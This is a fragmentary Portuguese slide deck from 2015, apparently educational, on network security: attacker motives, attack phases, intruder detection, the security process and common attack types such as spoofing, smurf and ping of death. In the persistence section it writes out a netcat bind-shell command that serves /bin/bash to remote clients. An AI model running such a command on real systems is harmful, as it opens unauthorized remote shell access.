Escolar Documentos
Profissional Documentos
Cultura Documentos
Maro de 2015
Inicialmente, se conscientizando...
por diverso,
Espionagem industrial;
Proveito prprio;
Inexperincia;
Vingana;
Curiosidade e Aprendizado;
Busca de aventuras;
Maldade;
Uma curiosidade...
Tipos de atacantes
Curiosos:
In-house:
Tcnicos:
Profissionais:
O atacante...
Reconhecimento da rede;
Explorao da rede;
O reforo;
E o saque.
Reconhecimento
Processo de:
validar a conectividade,
enumerar os servios e
Explorao
10
Reforo
servidor.py e cliente.py
Servidor: nc -l -p porta -e /bin/bash
Cliente: nc IP porta
11
Consolidao
Saque
Envolve:
13
A deteco do invasor
No reconhecimento:
Ex: nmap
14
A Deteco do Invasor
Na explorao:
15
A Deteco do Invasor
No reforo:
16
A Deteco do Invasor
Na consolidao
A Deteco do Invasor
No saque
O Processo de Segurana
Processo de Segurana
de avaliao,
de proteo,
de deteco e
de resposta ao ocorrido.
Avaliao
Proteo
Deteco
coletando,
identificando,
validando e
As invases so
violaes da poltica ou
Deteco
Deteco - Validao
reconhecimento/provas/exploraes
Resposta
o processo de
monitoramento de emergncia
Tipos de Ataques
Homem do Meio
Engenharia Social
Falhas de Autenticao
Explorando falhas,
Falhas de Protocolos
Ou causa lentido
Ataque LAND
Spoofing
atacar o DNS
Vazamento de informao
Ping,
Traceroute,
Telnet,
Nmap,
etc.
Ex: NmapSI4
Mail Bomb
Cavalos de Troia
Sondagem (Probing)
Smurf
Como funciona
Sniffing
Ping da Morte
algumas reinicializam,
Ataque de replay
Concluso
A segurana em redes e continuar sendo um importante tpico na rea da informtica, pois as redes
de computadores esto presentes em nosso cotidiano.
A medida que pessoas e paises ficam cada vez mais dependentes de computadores, provvel que
ataques cibernticos se tornem mais comuns. Isso tem levado muitos pases a acelerar sues esforos
para reforar suas defesas digitais, e alguns esto realizando testes em grande escala para avaliar o
desempenho de suas redes de computadores em resistir a ataques. Mesmo assim, "um crimonoso
munido de s uficiente tempo, motivao e financiamento ser sempre - sempre - capaz de penetrar em
um sistema-alvo".